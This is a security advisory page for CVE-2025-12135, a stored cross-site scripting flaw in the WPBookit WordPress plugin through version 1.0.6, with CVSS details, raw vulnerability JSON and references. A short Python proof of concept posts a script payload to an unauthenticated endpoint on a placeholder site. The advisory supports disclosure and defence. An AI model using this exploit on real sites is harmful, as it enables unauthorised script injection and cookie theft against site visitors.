Security Vulnerability Report
中文
CVE-2025-12135 CVSS 7.2 HIGH

CVE-2025-12135

Published: 2025-11-21 08:15:53
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The WPBookit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'css_code' parameter in all versions up to, and including, 1.0.6 due to a missing capability check on the save_custome_code() function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WPBookit plugin <= 1.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-12135 PoC - WPBookit Stored XSS # Target: WordPress site with WPBookit plugin <= 1.0.6 target_url = "http://target-wordpress-site.com" # Payload: Stored XSS via css_code parameter xss_payload = "<script>alert(document.cookie)</script>" # Step 1: Inject malicious CSS code containing XSS injection_url = f"{target_url}/wp-json/wpbookit/v1/save-custom-code" data = { "css_code": xss_payload } response = requests.post(injection_url, data=data, timeout=10) if response.status_code == 200: print("[+] XSS payload injected successfully") print(f"[+] Payload will execute when users visit affected pages") else: print("[-] Injection failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12135", "sourceIdentifier": "[email protected]", "published": "2025-11-21T08:15:52.717", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WPBookit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'css_code' parameter in all versions up to, and including, 1.0.6 due to a missing capability check on the save_custome_code() function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/d0n601/CVE-2025-12135", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpbookit/trunk/core/admin/classes/class.wpb-admin-routes-handler.php#L15", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpbookit/trunk/core/admin/classes/class.wpb-admin-routes.php#L118", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpbookit/trunk/core/admin/classes/controllers/class.wpb-setting-controller.php#L16", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3398463%40wpbookit&new=3398463%40wpbookit&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://ryankozak.com/posts/cve-2025-12135/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7d7b2c79-c4f7-4611-a22a-685d4421a4ab?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.